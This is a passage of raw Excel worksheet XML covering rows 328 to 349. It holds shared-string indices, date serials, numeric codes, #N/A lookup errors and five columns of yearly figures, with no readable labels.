      <c r="F328" s="60">
        <v>104</v>
      </c>
      <c r="G328" s="49" t="s">
        <v>2376</v>
      </c>
      <c r="H328" s="49" t="s">
        <v>3092</v>
      </c>
      <c r="I328" s="49" t="s">
        <v>31</v>
      </c>
      <c r="J328" s="49" t="s">
        <v>262</v>
      </c>
      <c r="K328" s="49" t="s">
        <v>31</v>
      </c>
      <c r="L328" s="49" t="s">
        <v>77</v>
      </c>
      <c r="M328" s="49" t="s">
        <v>262</v>
      </c>
      <c r="N328" s="49" t="s">
        <v>263</v>
      </c>
      <c r="O328" s="49"/>
      <c r="P328" s="49"/>
      <c r="Q328" s="49" t="s">
        <v>3611</v>
      </c>
      <c r="R328" s="84">
        <v>175315</v>
      </c>
      <c r="S328" s="83">
        <v>264901</v>
      </c>
      <c r="T328" s="83">
        <v>292700</v>
      </c>
      <c r="U328" s="84">
        <v>308208</v>
      </c>
      <c r="V328" s="84">
        <v>396773</v>
      </c>
      <c r="W328" s="49" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="329" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A329" s="49" t="s">
        <v>4</v>
      </c>
      <c r="B329" s="61">
        <v>44648.575936493056</v>
      </c>
      <c r="C329" s="49" t="s">
        <v>3090</v>
      </c>
      <c r="D329" s="76">
        <v>130</v>
      </c>
      <c r="E329" s="49" t="s">
        <v>3094</v>
      </c>
      <c r="F329" s="60">
        <v>120</v>
      </c>
      <c r="G329" s="63" t="s">
        <v>3095</v>
      </c>
      <c r="H329" s="49" t="s">
        <v>3096</v>
      </c>
      <c r="I329" s="49" t="s">
        <v>31</v>
      </c>
      <c r="J329" s="49" t="s">
        <v>262</v>
      </c>
      <c r="K329" s="49" t="s">
        <v>31</v>
      </c>
      <c r="L329" s="49" t="s">
        <v>77</v>
      </c>
      <c r="M329" s="49" t="s">
        <v>262</v>
      </c>
      <c r="N329" s="49" t="s">
        <v>263</v>
      </c>
      <c r="O329" s="49"/>
      <c r="P329" s="49"/>
      <c r="Q329" s="49" t="s">
        <v>3611</v>
      </c>
      <c r="R329" s="84" t="e">
        <v>#N/A</v>
      </c>
      <c r="S329" s="83">
        <v>4</v>
      </c>
      <c r="T329" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="U329" s="84" t="e">
        <v>#N/A</v>
      </c>
      <c r="V329" s="84" t="e">
        <v>#N/A</v>
      </c>
      <c r="W329" s="49" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="330" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A330" s="49" t="s">
        <v>4</v>
      </c>
      <c r="B330" s="61">
        <v>44426.747029513892</v>
      </c>
      <c r="C330" s="49" t="s">
        <v>3354</v>
      </c>
      <c r="D330" s="76">
        <v>112</v>
      </c>
      <c r="E330" s="49" t="s">
        <v>3355</v>
      </c>
      <c r="F330" s="60">
        <v>112</v>
      </c>
      <c r="G330" s="49" t="s">
        <v>3356</v>
      </c>
      <c r="H330" s="49" t="s">
        <v>3357</v>
      </c>
      <c r="I330" s="49" t="s">
        <v>268</v>
      </c>
      <c r="J330" s="49" t="s">
        <v>269</v>
      </c>
      <c r="K330" s="49" t="s">
        <v>10</v>
      </c>
      <c r="L330" s="49" t="s">
        <v>77</v>
      </c>
      <c r="M330" s="49" t="s">
        <v>270</v>
      </c>
      <c r="N330" s="49" t="s">
        <v>271</v>
      </c>
      <c r="O330" s="49"/>
      <c r="P330" s="49"/>
      <c r="Q330" s="49" t="s">
        <v>3612</v>
      </c>
      <c r="R330" s="84" t="e">
        <v>#N/A</v>
      </c>
      <c r="S330" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="T330" s="83">
        <v>11</v>
      </c>
      <c r="U330" s="84">
        <v>5</v>
      </c>
      <c r="V330" s="84">
        <v>74</v>
      </c>
      <c r="W330" s="49" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="331" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A331" s="49" t="s">
        <v>4</v>
      </c>
      <c r="B331" s="61">
        <v>44669.59422334491</v>
      </c>
      <c r="C331" s="49" t="s">
        <v>3359</v>
      </c>
      <c r="D331" s="60">
        <v>111</v>
      </c>
      <c r="E331" s="49" t="s">
        <v>3360</v>
      </c>
      <c r="F331" s="60">
        <v>100</v>
      </c>
      <c r="G331" s="63" t="s">
        <v>3361</v>
      </c>
      <c r="H331" s="49" t="s">
        <v>3362</v>
      </c>
      <c r="I331" s="49" t="s">
        <v>268</v>
      </c>
      <c r="J331" s="49" t="s">
        <v>269</v>
      </c>
      <c r="K331" s="49" t="s">
        <v>10</v>
      </c>
      <c r="L331" s="49" t="s">
        <v>77</v>
      </c>
      <c r="M331" s="49" t="s">
        <v>270</v>
      </c>
      <c r="N331" s="49" t="s">
        <v>271</v>
      </c>
      <c r="O331" s="49"/>
      <c r="P331" s="49"/>
      <c r="Q331" s="49" t="s">
        <v>3613</v>
      </c>
      <c r="R331" s="84" t="e">
        <v>#N/A</v>
      </c>
      <c r="S331" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="T331" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="U331" s="84" t="e">
        <v>#N/A</v>
      </c>
      <c r="V331" s="84" t="e">
        <v>#N/A</v>
      </c>
      <c r="W331" s="49" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="332" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A332" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B332" s="51">
        <v>44536.916149328703</v>
      </c>
      <c r="C332" s="1" t="s">
        <v>3359</v>
      </c>
      <c r="D332" s="43">
        <v>111</v>
      </c>
      <c r="E332" s="1" t="s">
        <v>3364</v>
      </c>
      <c r="F332" s="26">
        <v>111</v>
      </c>
      <c r="G332" s="1" t="s">
        <v>3365</v>
      </c>
      <c r="H332" s="1" t="s">
        <v>3366</v>
      </c>
      <c r="I332" s="1" t="s">
        <v>268</v>
      </c>
      <c r="J332" s="1" t="s">
        <v>269</v>
      </c>
      <c r="K332" s="1" t="s">
        <v>10</v>
      </c>
      <c r="L332" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M332" s="1" t="s">
        <v>270</v>
      </c>
      <c r="N332" s="1" t="s">
        <v>271</v>
      </c>
      <c r="O332" s="1"/>
      <c r="P332" s="1"/>
      <c r="Q332" s="1" t="s">
        <v>3613</v>
      </c>
      <c r="R332" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="S332" s="83">
        <v>44</v>
      </c>
      <c r="T332" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="U332" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="V332" s="83">
        <v>24</v>
      </c>
      <c r="W332" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="333" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A333" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B333" s="51">
        <v>44082.689054016206</v>
      </c>
      <c r="C333" s="1" t="s">
        <v>3367</v>
      </c>
      <c r="D333" s="43">
        <v>101</v>
      </c>
      <c r="E333" s="1" t="s">
        <v>3368</v>
      </c>
      <c r="F333" s="26">
        <v>101</v>
      </c>
      <c r="G333" s="1" t="s">
        <v>3369</v>
      </c>
      <c r="H333" s="1" t="s">
        <v>3346</v>
      </c>
      <c r="I333" s="1" t="s">
        <v>185</v>
      </c>
      <c r="J333" s="1" t="s">
        <v>186</v>
      </c>
      <c r="K333" s="1" t="s">
        <v>16</v>
      </c>
      <c r="L333" s="16" t="s">
        <v>83</v>
      </c>
      <c r="M333" s="1" t="s">
        <v>72</v>
      </c>
      <c r="N333" s="1"/>
      <c r="O333" s="1" t="s">
        <v>2601</v>
      </c>
      <c r="P333" s="1" t="s">
        <v>1795</v>
      </c>
      <c r="Q333" s="1" t="s">
        <v>3614</v>
      </c>
      <c r="R333" s="83">
        <v>29020</v>
      </c>
      <c r="S333" s="83">
        <v>35802</v>
      </c>
      <c r="T333" s="83">
        <v>42135</v>
      </c>
      <c r="U333" s="83">
        <v>42716</v>
      </c>
      <c r="V333" s="83">
        <v>48721</v>
      </c>
      <c r="W333" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="334" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A334" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B334" s="51">
        <v>44411.636757743057</v>
      </c>
      <c r="C334" s="1" t="s">
        <v>3385</v>
      </c>
      <c r="D334" s="43">
        <v>100</v>
      </c>
      <c r="E334" s="1" t="s">
        <v>3386</v>
      </c>
      <c r="F334" s="26">
        <v>100</v>
      </c>
      <c r="G334" s="1" t="s">
        <v>3387</v>
      </c>
      <c r="H334" s="1" t="s">
        <v>3388</v>
      </c>
      <c r="I334" s="1" t="s">
        <v>185</v>
      </c>
      <c r="J334" s="1" t="s">
        <v>542</v>
      </c>
      <c r="K334" s="1" t="s">
        <v>16</v>
      </c>
      <c r="L334" s="16" t="s">
        <v>83</v>
      </c>
      <c r="M334" s="1" t="s">
        <v>72</v>
      </c>
      <c r="N334" s="1"/>
      <c r="O334" s="1" t="s">
        <v>3389</v>
      </c>
      <c r="P334" s="1"/>
      <c r="Q334" s="1" t="s">
        <v>3615</v>
      </c>
      <c r="R334" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="S334" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="T334" s="83">
        <v>1</v>
      </c>
      <c r="U334" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="V334" s="83">
        <v>36</v>
      </c>
      <c r="W334" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="335" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A335" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B335" s="51">
        <v>44685.547926840278</v>
      </c>
      <c r="C335" s="1" t="s">
        <v>3391</v>
      </c>
      <c r="D335" s="43">
        <v>101</v>
      </c>
      <c r="E335" s="1" t="s">
        <v>3392</v>
      </c>
      <c r="F335" s="26">
        <v>101</v>
      </c>
      <c r="G335" s="1" t="s">
        <v>3393</v>
      </c>
      <c r="H335" s="1" t="s">
        <v>3388</v>
      </c>
      <c r="I335" s="1" t="s">
        <v>185</v>
      </c>
      <c r="J335" s="1" t="s">
        <v>542</v>
      </c>
      <c r="K335" s="1" t="s">
        <v>16</v>
      </c>
      <c r="L335" s="16" t="s">
        <v>83</v>
      </c>
      <c r="M335" s="1" t="s">
        <v>72</v>
      </c>
      <c r="N335" s="1"/>
      <c r="O335" s="1"/>
      <c r="P335" s="1"/>
      <c r="Q335" s="1" t="s">
        <v>3394</v>
      </c>
      <c r="R335" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="S335" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="T335" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="U335" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="V335" s="83">
        <v>45</v>
      </c>
      <c r="W335" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="336" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A336" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B336" s="51">
        <v>44025.550737395832</v>
      </c>
      <c r="C336" s="1" t="s">
        <v>3395</v>
      </c>
      <c r="D336" s="26">
        <v>203</v>
      </c>
      <c r="E336" s="1" t="s">
        <v>3396</v>
      </c>
      <c r="F336" s="26">
        <v>202</v>
      </c>
      <c r="G336" s="1" t="s">
        <v>3397</v>
      </c>
      <c r="H336" s="1" t="s">
        <v>3398</v>
      </c>
      <c r="I336" s="1" t="s">
        <v>268</v>
      </c>
      <c r="J336" s="1" t="s">
        <v>269</v>
      </c>
      <c r="K336" s="1" t="s">
        <v>10</v>
      </c>
      <c r="L336" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M336" s="1" t="s">
        <v>1766</v>
      </c>
      <c r="N336" s="1" t="s">
        <v>1767</v>
      </c>
      <c r="O336" s="1"/>
      <c r="P336" s="1"/>
      <c r="Q336" s="1" t="s">
        <v>3399</v>
      </c>
      <c r="R336" s="83">
        <v>3143578</v>
      </c>
      <c r="S336" s="83">
        <v>2956400</v>
      </c>
      <c r="T336" s="83">
        <v>2865356</v>
      </c>
      <c r="U336" s="83">
        <v>3160069</v>
      </c>
      <c r="V336" s="83">
        <v>3697353</v>
      </c>
      <c r="W336" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="337" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A337" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B337" s="51">
        <v>44252.944052418985</v>
      </c>
      <c r="C337" s="1" t="s">
        <v>3395</v>
      </c>
      <c r="D337" s="43">
        <v>301</v>
      </c>
      <c r="E337" s="1" t="s">
        <v>3396</v>
      </c>
      <c r="F337" s="43">
        <v>301</v>
      </c>
      <c r="G337" s="1" t="s">
        <v>3397</v>
      </c>
      <c r="H337" s="1" t="s">
        <v>3398</v>
      </c>
      <c r="I337" s="1" t="s">
        <v>268</v>
      </c>
      <c r="J337" s="1" t="s">
        <v>269</v>
      </c>
      <c r="K337" s="1" t="s">
        <v>10</v>
      </c>
      <c r="L337" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M337" s="1" t="s">
        <v>1766</v>
      </c>
      <c r="N337" s="1" t="s">
        <v>1767</v>
      </c>
      <c r="O337" s="1"/>
      <c r="P337" s="1"/>
      <c r="Q337" s="1" t="s">
        <v>3616</v>
      </c>
      <c r="R337" s="83">
        <v>3143578</v>
      </c>
      <c r="S337" s="83">
        <v>2956400</v>
      </c>
      <c r="T337" s="83">
        <v>2865356</v>
      </c>
      <c r="U337" s="83">
        <v>3160069</v>
      </c>
      <c r="V337" s="83">
        <v>3697353</v>
      </c>
      <c r="W337" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="338" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A338" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B338" s="51">
        <v>44448.04261384259</v>
      </c>
      <c r="C338" s="1" t="s">
        <v>3395</v>
      </c>
      <c r="D338" s="26">
        <v>100</v>
      </c>
      <c r="E338" s="1" t="s">
        <v>3396</v>
      </c>
      <c r="F338" s="26">
        <v>100</v>
      </c>
      <c r="G338" s="1" t="s">
        <v>3397</v>
      </c>
      <c r="H338" s="1" t="s">
        <v>3398</v>
      </c>
      <c r="I338" s="1" t="s">
        <v>268</v>
      </c>
      <c r="J338" s="1" t="s">
        <v>269</v>
      </c>
      <c r="K338" s="1" t="s">
        <v>10</v>
      </c>
      <c r="L338" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M338" s="1" t="s">
        <v>1766</v>
      </c>
      <c r="N338" s="1" t="s">
        <v>1767</v>
      </c>
      <c r="O338" s="1"/>
      <c r="P338" s="1"/>
      <c r="Q338" s="1" t="s">
        <v>161</v>
      </c>
      <c r="R338" s="83">
        <v>3143578</v>
      </c>
      <c r="S338" s="83">
        <v>2956400</v>
      </c>
      <c r="T338" s="83">
        <v>2865356</v>
      </c>
      <c r="U338" s="83">
        <v>3160069</v>
      </c>
      <c r="V338" s="83">
        <v>3697353</v>
      </c>
      <c r="W338" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="339" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A339" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B339" s="51">
        <v>44642.661433657406</v>
      </c>
      <c r="C339" s="1" t="s">
        <v>3395</v>
      </c>
      <c r="D339" s="43">
        <v>202</v>
      </c>
      <c r="E339" s="1" t="s">
        <v>3396</v>
      </c>
      <c r="F339" s="43">
        <v>201</v>
      </c>
      <c r="G339" s="1" t="s">
        <v>3397</v>
      </c>
      <c r="H339" s="1" t="s">
        <v>3401</v>
      </c>
      <c r="I339" s="1" t="s">
        <v>268</v>
      </c>
      <c r="J339" s="1" t="s">
        <v>269</v>
      </c>
      <c r="K339" s="1" t="s">
        <v>10</v>
      </c>
      <c r="L339" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M339" s="1" t="s">
        <v>1766</v>
      </c>
      <c r="N339" s="1" t="s">
        <v>1767</v>
      </c>
      <c r="O339" s="1"/>
      <c r="P339" s="1"/>
      <c r="Q339" s="1" t="s">
        <v>161</v>
      </c>
      <c r="R339" s="83">
        <v>3143578</v>
      </c>
      <c r="S339" s="83">
        <v>2956400</v>
      </c>
      <c r="T339" s="83">
        <v>2865356</v>
      </c>
      <c r="U339" s="83">
        <v>3160069</v>
      </c>
      <c r="V339" s="83">
        <v>3697353</v>
      </c>
      <c r="W339" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="340" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A340" s="49" t="s">
        <v>4</v>
      </c>
      <c r="B340" s="61">
        <v>44449.626449537034</v>
      </c>
      <c r="C340" s="49" t="s">
        <v>3422</v>
      </c>
      <c r="D340" s="76">
        <v>101</v>
      </c>
      <c r="E340" s="49" t="s">
        <v>3423</v>
      </c>
      <c r="F340" s="60">
        <v>101</v>
      </c>
      <c r="G340" s="49" t="s">
        <v>3424</v>
      </c>
      <c r="H340" s="49" t="s">
        <v>3425</v>
      </c>
      <c r="I340" s="49" t="s">
        <v>82</v>
      </c>
      <c r="J340" s="49" t="s">
        <v>32</v>
      </c>
      <c r="K340" s="49" t="s">
        <v>32</v>
      </c>
      <c r="L340" s="1" t="s">
        <v>83</v>
      </c>
      <c r="M340" s="49" t="s">
        <v>72</v>
      </c>
      <c r="N340" s="49"/>
      <c r="O340" s="49" t="s">
        <v>111</v>
      </c>
      <c r="P340" s="49"/>
      <c r="Q340" s="1" t="s">
        <v>161</v>
      </c>
      <c r="R340" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="S340" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="T340" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="U340" s="84" t="e">
        <v>#N/A</v>
      </c>
      <c r="V340" s="84" t="e">
        <v>#N/A</v>
      </c>
      <c r="W340" s="49" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="341" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A341" s="49" t="s">
        <v>4</v>
      </c>
      <c r="B341" s="61">
        <v>44558.744427129626</v>
      </c>
      <c r="C341" s="49" t="s">
        <v>3445</v>
      </c>
      <c r="D341" s="76">
        <v>100</v>
      </c>
      <c r="E341" s="49" t="s">
        <v>3446</v>
      </c>
      <c r="F341" s="60">
        <v>100</v>
      </c>
      <c r="G341" s="49" t="s">
        <v>3447</v>
      </c>
      <c r="H341" s="49" t="s">
        <v>3448</v>
      </c>
      <c r="I341" s="49" t="s">
        <v>31</v>
      </c>
      <c r="J341" s="49" t="s">
        <v>262</v>
      </c>
      <c r="K341" s="49" t="s">
        <v>31</v>
      </c>
      <c r="L341" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M341" s="1" t="s">
        <v>262</v>
      </c>
      <c r="N341" s="1" t="s">
        <v>263</v>
      </c>
      <c r="O341" s="49"/>
      <c r="P341" s="49"/>
      <c r="Q341" s="49" t="s">
        <v>3617</v>
      </c>
      <c r="R341" s="84">
        <v>104</v>
      </c>
      <c r="S341" s="83">
        <v>7159</v>
      </c>
      <c r="T341" s="83">
        <v>7318</v>
      </c>
      <c r="U341" s="84">
        <v>6270</v>
      </c>
      <c r="V341" s="84">
        <v>10197</v>
      </c>
      <c r="W341" s="49" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="342" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A342" s="49" t="s">
        <v>4</v>
      </c>
      <c r="B342" s="61">
        <v>44629.688684039349</v>
      </c>
      <c r="C342" s="49" t="s">
        <v>3457</v>
      </c>
      <c r="D342" s="60">
        <v>201</v>
      </c>
      <c r="E342" s="49" t="s">
        <v>3458</v>
      </c>
      <c r="F342" s="60">
        <v>201</v>
      </c>
      <c r="G342" s="49" t="s">
        <v>3459</v>
      </c>
      <c r="H342" s="49" t="s">
        <v>3216</v>
      </c>
      <c r="I342" s="49" t="s">
        <v>156</v>
      </c>
      <c r="J342" s="49" t="s">
        <v>157</v>
      </c>
      <c r="K342" s="49" t="s">
        <v>26</v>
      </c>
      <c r="L342" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M342" s="49" t="s">
        <v>475</v>
      </c>
      <c r="N342" s="1" t="s">
        <v>476</v>
      </c>
      <c r="O342" s="49"/>
      <c r="P342" s="49"/>
      <c r="Q342" s="49" t="s">
        <v>1325</v>
      </c>
      <c r="R342" s="84">
        <v>23</v>
      </c>
      <c r="S342" s="83">
        <v>66</v>
      </c>
      <c r="T342" s="83">
        <v>49</v>
      </c>
      <c r="U342" s="84">
        <v>9</v>
      </c>
      <c r="V342" s="84">
        <v>6</v>
      </c>
      <c r="W342" s="49" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="343" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A343" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B343" s="51">
        <v>44629.696740081017</v>
      </c>
      <c r="C343" s="1" t="s">
        <v>3460</v>
      </c>
      <c r="D343" s="26">
        <v>200</v>
      </c>
      <c r="E343" s="1" t="s">
        <v>3461</v>
      </c>
      <c r="F343" s="26">
        <v>200</v>
      </c>
      <c r="G343" s="1" t="s">
        <v>3462</v>
      </c>
      <c r="H343" s="1" t="s">
        <v>3463</v>
      </c>
      <c r="I343" s="1" t="s">
        <v>156</v>
      </c>
      <c r="J343" s="1" t="s">
        <v>157</v>
      </c>
      <c r="K343" s="1" t="s">
        <v>26</v>
      </c>
      <c r="L343" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M343" s="1" t="s">
        <v>475</v>
      </c>
      <c r="N343" s="1" t="s">
        <v>476</v>
      </c>
      <c r="O343" s="1"/>
      <c r="P343" s="1"/>
      <c r="Q343" s="59" t="s">
        <v>1325</v>
      </c>
      <c r="R343" s="88">
        <v>12</v>
      </c>
      <c r="S343" s="83">
        <v>44</v>
      </c>
      <c r="T343" s="83">
        <v>259</v>
      </c>
      <c r="U343" s="88">
        <v>205</v>
      </c>
      <c r="V343" s="88">
        <v>178</v>
      </c>
      <c r="W343" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="344" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A344" s="49" t="s">
        <v>4</v>
      </c>
      <c r="B344" s="61">
        <v>44519.444953668979</v>
      </c>
      <c r="C344" s="49" t="s">
        <v>3460</v>
      </c>
      <c r="D344" s="60">
        <v>201</v>
      </c>
      <c r="E344" s="49" t="s">
        <v>3461</v>
      </c>
      <c r="F344" s="60">
        <v>201</v>
      </c>
      <c r="G344" s="49" t="s">
        <v>3462</v>
      </c>
      <c r="H344" s="49" t="s">
        <v>3463</v>
      </c>
      <c r="I344" s="49" t="s">
        <v>156</v>
      </c>
      <c r="J344" s="49" t="s">
        <v>157</v>
      </c>
      <c r="K344" s="49" t="s">
        <v>26</v>
      </c>
      <c r="L344" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M344" s="49" t="s">
        <v>475</v>
      </c>
      <c r="N344" s="1" t="s">
        <v>476</v>
      </c>
      <c r="O344" s="49"/>
      <c r="P344" s="49"/>
      <c r="Q344" s="1" t="s">
        <v>161</v>
      </c>
      <c r="R344" s="83">
        <v>12</v>
      </c>
      <c r="S344" s="83">
        <v>44</v>
      </c>
      <c r="T344" s="83">
        <v>259</v>
      </c>
      <c r="U344" s="84">
        <v>205</v>
      </c>
      <c r="V344" s="84">
        <v>178</v>
      </c>
      <c r="W344" s="49" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="345" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A345" s="49" t="s">
        <v>4</v>
      </c>
      <c r="B345" s="61">
        <v>44629.696740092593</v>
      </c>
      <c r="C345" s="49" t="s">
        <v>3460</v>
      </c>
      <c r="D345" s="60">
        <v>200</v>
      </c>
      <c r="E345" s="49" t="s">
        <v>3464</v>
      </c>
      <c r="F345" s="60">
        <v>200</v>
      </c>
      <c r="G345" s="49" t="s">
        <v>3465</v>
      </c>
      <c r="H345" s="49" t="s">
        <v>3220</v>
      </c>
      <c r="I345" s="49" t="s">
        <v>156</v>
      </c>
      <c r="J345" s="49" t="s">
        <v>157</v>
      </c>
      <c r="K345" s="49" t="s">
        <v>26</v>
      </c>
      <c r="L345" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M345" s="49" t="s">
        <v>475</v>
      </c>
      <c r="N345" s="1" t="s">
        <v>476</v>
      </c>
      <c r="O345" s="49"/>
      <c r="P345" s="49"/>
      <c r="Q345" s="49" t="s">
        <v>1325</v>
      </c>
      <c r="R345" s="84">
        <v>2</v>
      </c>
      <c r="S345" s="83">
        <v>24</v>
      </c>
      <c r="T345" s="83">
        <v>77</v>
      </c>
      <c r="U345" s="84">
        <v>48</v>
      </c>
      <c r="V345" s="84">
        <v>73</v>
      </c>
      <c r="W345" s="49" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="346" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A346" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B346" s="51">
        <v>44519.444953692131</v>
      </c>
      <c r="C346" s="1" t="s">
        <v>3460</v>
      </c>
      <c r="D346" s="26">
        <v>201</v>
      </c>
      <c r="E346" s="1" t="s">
        <v>3464</v>
      </c>
      <c r="F346" s="26">
        <v>201</v>
      </c>
      <c r="G346" s="1" t="s">
        <v>3465</v>
      </c>
      <c r="H346" s="1" t="s">
        <v>3220</v>
      </c>
      <c r="I346" s="1" t="s">
        <v>156</v>
      </c>
      <c r="J346" s="1" t="s">
        <v>157</v>
      </c>
      <c r="K346" s="1" t="s">
        <v>26</v>
      </c>
      <c r="L346" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M346" s="1" t="s">
        <v>475</v>
      </c>
      <c r="N346" s="1" t="s">
        <v>476</v>
      </c>
      <c r="O346" s="1"/>
      <c r="P346" s="1"/>
      <c r="Q346" s="1" t="s">
        <v>161</v>
      </c>
      <c r="R346" s="83">
        <v>2</v>
      </c>
      <c r="S346" s="83">
        <v>24</v>
      </c>
      <c r="T346" s="83">
        <v>77</v>
      </c>
      <c r="U346" s="83">
        <v>48</v>
      </c>
      <c r="V346" s="83">
        <v>73</v>
      </c>
      <c r="W346" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="347" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A347" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B347" s="51">
        <v>44629.696740092593</v>
      </c>
      <c r="C347" s="1" t="s">
        <v>3460</v>
      </c>
      <c r="D347" s="26">
        <v>200</v>
      </c>
      <c r="E347" s="1" t="s">
        <v>3466</v>
      </c>
      <c r="F347" s="26">
        <v>200</v>
      </c>
      <c r="G347" s="1" t="s">
        <v>3467</v>
      </c>
      <c r="H347" s="1" t="s">
        <v>3226</v>
      </c>
      <c r="I347" s="1" t="s">
        <v>156</v>
      </c>
      <c r="J347" s="1" t="s">
        <v>157</v>
      </c>
      <c r="K347" s="1" t="s">
        <v>26</v>
      </c>
      <c r="L347" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M347" s="1" t="s">
        <v>475</v>
      </c>
      <c r="N347" s="1" t="s">
        <v>476</v>
      </c>
      <c r="O347" s="1"/>
      <c r="P347" s="1"/>
      <c r="Q347" s="1" t="s">
        <v>1325</v>
      </c>
      <c r="R347" s="83">
        <v>2</v>
      </c>
      <c r="S347" s="83">
        <v>22</v>
      </c>
      <c r="T347" s="83">
        <v>207</v>
      </c>
      <c r="U347" s="83">
        <v>203</v>
      </c>
      <c r="V347" s="83">
        <v>178</v>
      </c>
      <c r="W347" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="348" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A348" s="49" t="s">
        <v>4</v>
      </c>
      <c r="B348" s="61">
        <v>44519.444953726852</v>
      </c>
      <c r="C348" s="49" t="s">
        <v>3460</v>
      </c>
      <c r="D348" s="60">
        <v>201</v>
      </c>
      <c r="E348" s="49" t="s">
        <v>3466</v>
      </c>
      <c r="F348" s="60">
        <v>201</v>
      </c>
      <c r="G348" s="49" t="s">
        <v>3467</v>
      </c>
      <c r="H348" s="49" t="s">
        <v>3226</v>
      </c>
      <c r="I348" s="49" t="s">
        <v>156</v>
      </c>
      <c r="J348" s="49" t="s">
        <v>157</v>
      </c>
      <c r="K348" s="49" t="s">
        <v>26</v>
      </c>
      <c r="L348" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M348" s="1" t="s">
        <v>475</v>
      </c>
      <c r="N348" s="1" t="s">
        <v>476</v>
      </c>
      <c r="O348" s="1"/>
      <c r="P348" s="1"/>
      <c r="Q348" s="1" t="s">
        <v>161</v>
      </c>
      <c r="R348" s="83">
        <v>2</v>
      </c>
      <c r="S348" s="83">
        <v>22</v>
      </c>
      <c r="T348" s="83">
        <v>207</v>
      </c>
      <c r="U348" s="84">
        <v>203</v>
      </c>
      <c r="V348" s="84">
        <v>178</v>
      </c>
      <c r="W348" s="49" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="349" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A349" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B349" s="51">
        <v>44519.444953749997</v>
      </c>
      <c r="C349" s="1" t="s">
        <v>3460</v>
      </c>
      <c r="D349" s="26">
        <v>200</v>
      </c>
      <c r="E349" s="1" t="s">
        <v>3468</v>
      </c>
      <c r="F349" s="26">
        <v>200</v>
      </c>
      <c r="G349" s="1" t="s">
        <v>3469</v>
      </c>
      <c r="H349" s="1" t="s">
        <v>3470</v>
      </c>
      <c r="I349" s="1" t="s">
        <v>156</v>
      </c>
      <c r="J349" s="1" t="s">
